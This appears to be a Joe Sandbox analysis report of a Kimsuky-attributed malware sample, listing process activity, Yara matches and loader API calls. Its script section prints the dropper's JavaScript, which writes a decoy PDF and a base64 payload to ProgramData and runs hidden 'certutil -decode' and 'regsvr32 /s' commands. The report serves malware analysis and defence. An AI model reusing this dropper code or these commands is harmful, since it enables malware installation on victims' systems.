Analysis Process: cmd.exe PID: 1252 Parent PID: 5280

General

Start time:	10:58:53
Start date:	25/08/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C5CF.tmp.bat
Imagebase:	0x7ff6c71a0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 5276 Parent PID: 5280

General

Start time:	10:58:53
Start date:	25/08/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	regsvr32.exe /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll'
Imagebase:	0x7ff71df80000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Kimsuky, Description: Yara detected Kimsuky, Source: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5336 Parent PID: 1252

General

Start time:	10:58:54
Start date:	25/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7a3f70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RdrCEF.exe PID: 3812 Parent PID: 3972

General

Start time:	10:59:07
Start date:	25/08/2021
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=BC6E485E39BA42C7D01E94B3E9769F20 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=BC6E485E39BA42C7D01E94B3E9769F20 --renderer-client-id=4 --mojo-platform-channel-handle=1848 --allow-no-sandbox-job /prefetch:1
Imagebase:	0xde0000
File size:	9805296 bytes
MD5 hash:	C4531F5D235167293675FF6CE5472440
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 5740 Parent PID: 5276

General

Start time:	10:59:01
Start date:	25/08/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas
Imagebase:	0x7ff7c39f0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 2228 Parent PID: 5740

General

Start time:	10:59:02
Start date:	25/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7a3f70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: regsvr32.exe PID: 2792 Parent PID: 3588

General

Start time:	10:59:04
Start date:	25/08/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\regsvr32.exe' /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll'
Imagebase:	0x7ff71df80000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Kimsuky, Description: Yara detected Kimsuky, Source: 00000018.00000002.558431847.00007FF983D01000.00000040.00020000.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: RdrCEF.exe PID: 5132 Parent PID: 3972

General

Start time:	10:59:14
Start date:	25/08/2021
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=747A9B4378C4A9B7BB34D82AEF8DC480 --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2
Imagebase:	0xde0000
File size:	9805296 bytes
MD5 hash:	C4531F5D235167293675FF6CE5472440
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powershell.exe PID: 2324 Parent PID: 2792

General

Start time:	10:59:10
Start date:	25/08/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas
Imagebase:	0x7ff7c39f0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: conhost.exe PID: 5732 Parent PID: 2324

General

Start time:	10:59:11
Start date:	25/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7a3f70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: regsvr32.exe PID: 1328 Parent PID: 3588

General

Start time:	10:59:13
Start date:	25/08/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\regsvr32.exe' /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll'
Imagebase:	0x7ff71df80000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: regsvr32.exe PID: 2052 Parent PID: 5740

General

Start time:	10:59:17
Start date:	25/08/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\regsvr32.exe' /s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll
Imagebase:	0x7ff71df80000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000021.00000003.657307580.0000000004F17000.00000004.00000001.sdmp, Author: Florian Roth

Chronological Activities

Analysis Process: RdrCEF.exe PID: 6260 Parent PID: 3972

General

Start time:	10:59:28
Start date:	25/08/2021
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=4DDA8CE3F3D37EB15CD09F11D5C7C42B --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2
Imagebase:	0xde0000
File size:	9805296 bytes
MD5 hash:	C4531F5D235167293675FF6CE5472440
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: regsvr32.exe PID: 380 Parent PID: 2324

General

Start time:	10:59:22
Start date:	25/08/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\regsvr32.exe' /s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll
Imagebase:	0x7ff71df80000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: RdrCEF.exe PID: 2764 Parent PID: 3972

General

Start time:	10:59:35
Start date:	25/08/2021
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=29BE366D42ABBCFC024ED1AE01B6F680 --mojo-platform-channel-handle=1828 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2
Imagebase:	0xde0000
File size:	9805296 bytes
MD5 hash:	C4531F5D235167293675FF6CE5472440
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

JavaScript Code

Call Graph

Executed
Not Executed

Script:

Code
0	try
1	{
2	d6rdVIu1CNC = "JVBERi0xLjQKJcO+CjEgMCBvYmo8PC9QYWdlcyA4NSAwIFIgL091dGxpbmVzIDE3IDAgUiAvVHlwZSAvQ2...
3	trhZnprDzG9 = "\xfffd\x0731\xfffd\xfffd\xfffd \xfffd\xfffd\xfffd\xfffd 2021-05-07.pdf";
4	tbPaitkT4N4 = "VFZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU...
5	zzHMmkBwRtg = "efVo8cq.sIhn";
6	zIbtnpb1F3W = "glK7UwV.pR9a";
7	jfKuGes = new ActiveXObject ( "Microsoft.XMLDOM" );
8	bbIIrjT = WScript.CreateObject ( "Scripting.FileSystemObject" );	Windows Script Host.CreateObject("Scripting.FileSystemObject") ➔
9	puXN8a04N = new ActiveXObject ( "WScript.Shell" );
10	d5OiKu6nsDP = bbIIrjT.GetSpecialFolder ( 0 ) + "\\..\\ProgramData";	GetSpecialFolder(0) ➔ C:\Windows
11	m5NxSERTu = jfKuGes.createElement ( "yJ2bTRX" );	createElement("yJ2bTRX") ➔
12	m5NxSERTu.dataType = "bin.base64";
13	m5NxSERTu.text = d6rdVIu1CNC;
14	ubC93V43Ytyiws1 = m5NxSERTu.nodeTypedValue;
15	fTFlXWHxRT1bQ = new ActiveXObject ( "ADODB.Stream" );
16	fTFlXWHxRT1bQ.Open ( );	Open() ➔ undefined
17	fTFlXWHxRT1bQ.Type = 1;
18	fTFlXWHxRT1bQ.Write ( ubC93V43Ytyiws1 );	Write() ➔ undefined
19	fTFlXWHxRT1bQ.SaveToFile ( d5OiKu6nsDP + "\\" + trhZnprDzG9, 2 );	SaveToFile("C:\Windows\..\ProgramData\\xef\xbf\xbd\xdc\xb1\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd \xef\xbf\xbd\...",2) ➔ undefined
20	fTFlXWHxRT1bQ.Close ( );	Close() ➔ undefined
21	if ( bbIIrjT.FileExists ( d5OiKu6nsDP + "\\" + trhZnprDzG9 ) )	FileExists("C:\Windows\..\ProgramData\\xef\xbf\xbd\xdc\xb1\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd \xef\xbf\xbd\...") ➔ true
22	{
23	try
24	{
25	puXN8a04N.Run ( "\"" + d5OiKu6nsDP + "\\" + trhZnprDzG9 + "\"" );	Run(""C:\Windows\..\ProgramData\\xef\xbf\xbd\xdc\xb1\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd \xef\xbf\xbd...") ➔ 0
26	}
27	catch ( e )
28	{
29	}
30	}
31	a9PDYO8b9 = jfKuGes.createElement ( "bnKtD9l" );	createElement("bnKtD9l") ➔
32	a9PDYO8b9.dataType = "bin.base64";
33	a9PDYO8b9.text = tbPaitkT4N4;
34	fKdiu33gSKzghNi = a9PDYO8b9.nodeTypedValue;
35	jYubb9j555tQW = new ActiveXObject ( "ADODB.Stream" );
36	jYubb9j555tQW.Open ( );	Open() ➔ undefined
37	jYubb9j555tQW.Type = 1;
38	jYubb9j555tQW.Write ( fKdiu33gSKzghNi );	Write() ➔ undefined
39	jYubb9j555tQW.SaveToFile ( d5OiKu6nsDP + "\\" + zzHMmkBwRtg, 2 );	SaveToFile("C:\Windows\..\ProgramData\efVo8cq.sIhn",2) ➔ undefined
40	jYubb9j555tQW.Close ( );	Close() ➔ undefined
41	if ( bbIIrjT.FileExists ( d5OiKu6nsDP + "\\" + zzHMmkBwRtg ) )	FileExists("C:\Windows\..\ProgramData\efVo8cq.sIhn") ➔ true
42	{
43	try
44	{
45	puXN8a04N.Run ( "powershell.exe -windowstyle hidden certutil -decode " + d5OiKu6nsDP + "\\" + zzH...	Run("powershell.exe -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Wi...",0,true) ➔ 0
46	WScript.Sleep ( 10 * 1000 );	Windows Script Host.Sleep(10000) ➔ undefined
47	}
48	catch ( e )
49	{
50	}
51	}
52	if ( bbIIrjT.FileExists ( d5OiKu6nsDP + "\\" + zIbtnpb1F3W ) )	FileExists("C:\Windows\..\ProgramData\glK7UwV.pR9a") ➔ true
53	{
54	try
55	{
56	puXN8a04N.Run ( "powershell.exe -windowstyle hidden regsvr32.exe /s " + d5OiKu6nsDP + "\\" + zIbt...	Run("powershell.exe -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a",0,true) ➔ 0
57	}
58	catch ( e )
59	{
60	}
61	}
62	}
63	catch ( e )
64	{
65	}

Reset < >

Analysis Process: powershell.exe PID: 304 Parent PID: 7044 powershell.exeCOMMON

Executed Functions

Function 00007FF92ABB1375, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.455759806.00007FF92ABB0000.00000040.00000001.sdmp, Offset: 00007FF92ABB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff92abb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7cdd028d473a66b94409b2756684801ecd44d0574cfd85c32c7e75db4444718
Instruction ID: c2bc3e6f05274e69dd349349784f3627046863ec3c894c0fdef27fe1a2bbc514
Opcode Fuzzy Hash: d7cdd028d473a66b94409b2756684801ecd44d0574cfd85c32c7e75db4444718
Instruction Fuzzy Hash: 8501677111CB0C4FD744EF0CE451AA9B7E0FB95324F50056EE58AC3691D636E892CB46

Uniqueness

Uniqueness Score: 0.00%

Non-executed Functions

Analysis Process: powershell.exe PID: 4168 Parent PID: 7044 powershell.exeCOMMON

Executed Functions

Function 00007FF92AC31375, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.527931144.00007FF92AC30000.00000040.00000001.sdmp, Offset: 00007FF92AC30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff92ac30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1097b688274331deb7755fff744f21102ea0ca000cc610780641121fb74799c
Instruction ID: 46df73095c5545ec6211eca0e64841009b86b13ea09ffd7a2020c61878b28508
Opcode Fuzzy Hash: a1097b688274331deb7755fff744f21102ea0ca000cc610780641121fb74799c
Instruction Fuzzy Hash: 1E01677111CB0C4FDB44EF0CE451AB5B7E0FB95324F50056EE58AC3651D636E892CB46

Uniqueness

Uniqueness Score: 0.00%

Non-executed Functions

Analysis Process: regsvr32.exe PID: 5280 Parent PID: 4168 regsvr32.exeUNIQUE

Executed Functions

Function 00007FF983DABCCF, Relevance: 644.1, APIs: 211, Strings: 154, Instructions: 5325libraryloaderUNIQUE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF983DABCD5
GetProcAddress.KERNEL32 ref: 00007FF983DABE13
ExitProcess.KERNEL32 ref: 00007FF983DB0FF0

Part of subcall function 00007FF983DAB580: WideCharToMultiByte.KERNEL32 ref: 00007FF983DAB5F8
Part of subcall function 00007FF983DAB580: WideCharToMultiByte.KERNEL32 ref: 00007FF983DAB6AF

GetProcAddress.KERNEL32 ref: 00007FF983DABF5B
GetProcAddress.KERNEL32 ref: 00007FF983DAC0A3
GetProcAddress.KERNEL32 ref: 00007FF983DAC1EB
GetProcAddress.KERNEL32 ref: 00007FF983DAC333
GetProcAddress.KERNEL32 ref: 00007FF983DAC47B
GetProcAddress.KERNEL32 ref: 00007FF983DAC5C3
GetProcAddress.KERNEL32 ref: 00007FF983DAC70B
GetProcAddress.KERNEL32 ref: 00007FF983DAC853
GetProcAddress.KERNEL32 ref: 00007FF983DAC99B
GetProcAddress.KERNEL32 ref: 00007FF983DACAE3

Part of subcall function 00007FF983DAB330: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DAB572

GetProcAddress.KERNEL32 ref: 00007FF983DACC2B
GetProcAddress.KERNEL32 ref: 00007FF983DACD73
GetProcAddress.KERNEL32 ref: 00007FF983DACEBB
GetProcAddress.KERNEL32 ref: 00007FF983DAD003
GetProcAddress.KERNEL32 ref: 00007FF983DAD14B
GetProcAddress.KERNEL32 ref: 00007FF983DAD293
GetProcAddress.KERNEL32 ref: 00007FF983DAD3DB
GetProcAddress.KERNEL32 ref: 00007FF983DAD48D
GetProcAddress.KERNEL32 ref: 00007FF983DAD4FE

Part of subcall function 00007FF983D93D50: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D93DA8

GetProcAddress.KERNEL32 ref: 00007FF983DAD56F
GetProcAddress.KERNEL32 ref: 00007FF983DAD5E0
GetProcAddress.KERNEL32 ref: 00007FF983DAD651
GetProcAddress.KERNEL32 ref: 00007FF983DAD6C2
GetProcAddress.KERNEL32 ref: 00007FF983DAD733
GetProcAddress.KERNEL32 ref: 00007FF983DAD7A4
GetProcAddress.KERNEL32 ref: 00007FF983DAD815
GetProcAddress.KERNEL32 ref: 00007FF983DAD886
GetProcAddress.KERNEL32 ref: 00007FF983DAD8F7
GetProcAddress.KERNEL32 ref: 00007FF983DAD968
GetProcAddress.KERNEL32 ref: 00007FF983DAD9D9
GetProcAddress.KERNEL32 ref: 00007FF983DADA4A
GetProcAddress.KERNEL32 ref: 00007FF983DADABB
GetProcAddress.KERNEL32 ref: 00007FF983DADB2C
GetProcAddress.KERNEL32 ref: 00007FF983DADB9D
GetProcAddress.KERNEL32 ref: 00007FF983DADC08
GetProcAddress.KERNEL32 ref: 00007FF983DADC79
GetProcAddress.KERNEL32 ref: 00007FF983DADCEA
GetProcAddress.KERNEL32 ref: 00007FF983DADD5B
GetProcAddress.KERNEL32 ref: 00007FF983DADDCC
GetProcAddress.KERNEL32 ref: 00007FF983DADE3D
GetProcAddress.KERNEL32 ref: 00007FF983DADEAE
GetProcAddress.KERNEL32 ref: 00007FF983DADF1F
GetProcAddress.KERNEL32 ref: 00007FF983DADF90
GetProcAddress.KERNEL32 ref: 00007FF983DAE001
GetProcAddress.KERNEL32 ref: 00007FF983DAE072
GetProcAddress.KERNEL32 ref: 00007FF983DAE0E3
GetProcAddress.KERNEL32 ref: 00007FF983DAE154
GetProcAddress.KERNEL32 ref: 00007FF983DAE1C5
GetProcAddress.KERNEL32 ref: 00007FF983DAE236
GetProcAddress.KERNEL32 ref: 00007FF983DAE2A7
GetProcAddress.KERNEL32 ref: 00007FF983DAE318
GetProcAddress.KERNEL32 ref: 00007FF983DAE389
GetProcAddress.KERNEL32 ref: 00007FF983DAE3FA
GetProcAddress.KERNEL32 ref: 00007FF983DAE46B
GetProcAddress.KERNEL32 ref: 00007FF983DAE4DC
GetProcAddress.KERNEL32 ref: 00007FF983DAE54D
GetProcAddress.KERNEL32 ref: 00007FF983DAE5BE
GetProcAddress.KERNEL32 ref: 00007FF983DAE62F
GetProcAddress.KERNEL32 ref: 00007FF983DAE6A0
GetProcAddress.KERNEL32 ref: 00007FF983DAE711
GetProcAddress.KERNEL32 ref: 00007FF983DAE782
GetProcAddress.KERNEL32 ref: 00007FF983DAE7F3
GetProcAddress.KERNEL32 ref: 00007FF983DAE864
GetProcAddress.KERNEL32 ref: 00007FF983DAE8D5
GetProcAddress.KERNEL32 ref: 00007FF983DAE946
GetProcAddress.KERNEL32 ref: 00007FF983DAE9B7
GetProcAddress.KERNEL32 ref: 00007FF983DAEA28
GetProcAddress.KERNEL32 ref: 00007FF983DAEA99
GetProcAddress.KERNEL32 ref: 00007FF983DAEB0A
LoadLibraryA.KERNEL32 ref: 00007FF983DAEB78
GetProcAddress.KERNEL32 ref: 00007FF983DAEBE0
GetProcAddress.KERNEL32 ref: 00007FF983DAEC51
GetProcAddress.KERNEL32 ref: 00007FF983DAECC2
GetProcAddress.KERNEL32 ref: 00007FF983DAED33
GetProcAddress.KERNEL32 ref: 00007FF983DAEDA4
GetProcAddress.KERNEL32 ref: 00007FF983DAEE15
GetProcAddress.KERNEL32 ref: 00007FF983DAEE86
GetProcAddress.KERNEL32 ref: 00007FF983DAEEF7
GetProcAddress.KERNEL32 ref: 00007FF983DAEF68
GetProcAddress.KERNEL32 ref: 00007FF983DAEFD9
GetProcAddress.KERNEL32 ref: 00007FF983DAF04A
GetProcAddress.KERNEL32 ref: 00007FF983DAF0BB
GetProcAddress.KERNEL32 ref: 00007FF983DAF12C
GetProcAddress.KERNEL32 ref: 00007FF983DAF19D
GetProcAddress.KERNEL32 ref: 00007FF983DAF20E
GetProcAddress.KERNEL32 ref: 00007FF983DAF27F
GetProcAddress.KERNEL32 ref: 00007FF983DAF2F0
GetProcAddress.KERNEL32 ref: 00007FF983DAF361
LoadLibraryA.KERNEL32 ref: 00007FF983DAF3CF
GetProcAddress.KERNEL32 ref: 00007FF983DAF437
GetProcAddress.KERNEL32 ref: 00007FF983DAF4A8
GetProcAddress.KERNEL32 ref: 00007FF983DAF519
GetProcAddress.KERNEL32 ref: 00007FF983DAF58A
GetProcAddress.KERNEL32 ref: 00007FF983DAF5FB
GetProcAddress.KERNEL32 ref: 00007FF983DAF66C
GetProcAddress.KERNEL32 ref: 00007FF983DAF6DD
GetProcAddress.KERNEL32 ref: 00007FF983DAF74E
GetProcAddress.KERNEL32 ref: 00007FF983DAF7BF
GetProcAddress.KERNEL32 ref: 00007FF983DAF830
LoadLibraryA.KERNELBASE ref: 00007FF983DAF89E
GetProcAddress.KERNEL32 ref: 00007FF983DAF906
GetProcAddress.KERNEL32 ref: 00007FF983DAF977
GetProcAddress.KERNEL32 ref: 00007FF983DAF9E8
GetProcAddress.KERNEL32 ref: 00007FF983DAFA59
LoadLibraryA.KERNEL32 ref: 00007FF983DAFAC7
GetProcAddress.KERNEL32 ref: 00007FF983DAFB2F
GetProcAddress.KERNEL32 ref: 00007FF983DAFBA0
GetProcAddress.KERNEL32 ref: 00007FF983DAFC11
GetProcAddress.KERNEL32 ref: 00007FF983DAFC82
GetProcAddress.KERNEL32 ref: 00007FF983DAFCF3
GetProcAddress.KERNEL32 ref: 00007FF983DAFD64
GetProcAddress.KERNEL32 ref: 00007FF983DAFDD5
GetProcAddress.KERNEL32 ref: 00007FF983DAFE46
GetProcAddress.KERNEL32 ref: 00007FF983DAFEB7
GetProcAddress.KERNEL32 ref: 00007FF983DAFF28
GetProcAddress.KERNEL32 ref: 00007FF983DAFF99
GetProcAddress.KERNEL32 ref: 00007FF983DB000A
GetProcAddress.KERNEL32 ref: 00007FF983DB007B
GetProcAddress.KERNEL32 ref: 00007FF983DB00EC
GetProcAddress.KERNEL32 ref: 00007FF983DB015D
GetProcAddress.KERNEL32 ref: 00007FF983DB01CE
LoadLibraryA.KERNEL32 ref: 00007FF983DB023C
GetProcAddress.KERNEL32 ref: 00007FF983DB02A4
GetProcAddress.KERNEL32 ref: 00007FF983DB0315
LoadLibraryA.KERNEL32 ref: 00007FF983DB0383
GetProcAddress.KERNEL32 ref: 00007FF983DB03EB
LoadLibraryA.KERNELBASE ref: 00007FF983DB0459
GetProcAddress.KERNEL32 ref: 00007FF983DB04C1
GetProcAddress.KERNEL32 ref: 00007FF983DB0532
GetProcAddress.KERNEL32 ref: 00007FF983DB05A3
GetProcAddress.KERNEL32 ref: 00007FF983DB0614
GetProcAddress.KERNEL32 ref: 00007FF983DB0685
GetProcAddress.KERNEL32 ref: 00007FF983DB06F6
GetProcAddress.KERNEL32 ref: 00007FF983DB0767
GetProcAddress.KERNEL32 ref: 00007FF983DB07D8
GetProcAddress.KERNEL32 ref: 00007FF983DB0849
GetProcAddress.KERNEL32 ref: 00007FF983DB08BA
GetProcAddress.KERNEL32 ref: 00007FF983DB092B
GetProcAddress.KERNEL32 ref: 00007FF983DB099C
GetProcAddress.KERNEL32 ref: 00007FF983DB0A0D
GetProcAddress.KERNEL32 ref: 00007FF983DB0A7E
GetProcAddress.KERNEL32 ref: 00007FF983DB0AEF
GetProcAddress.KERNEL32 ref: 00007FF983DB0B60
GetProcAddress.KERNEL32 ref: 00007FF983DB0BD1
GetProcAddress.KERNEL32 ref: 00007FF983DB0C42
GetProcAddress.KERNEL32 ref: 00007FF983DB0CB3
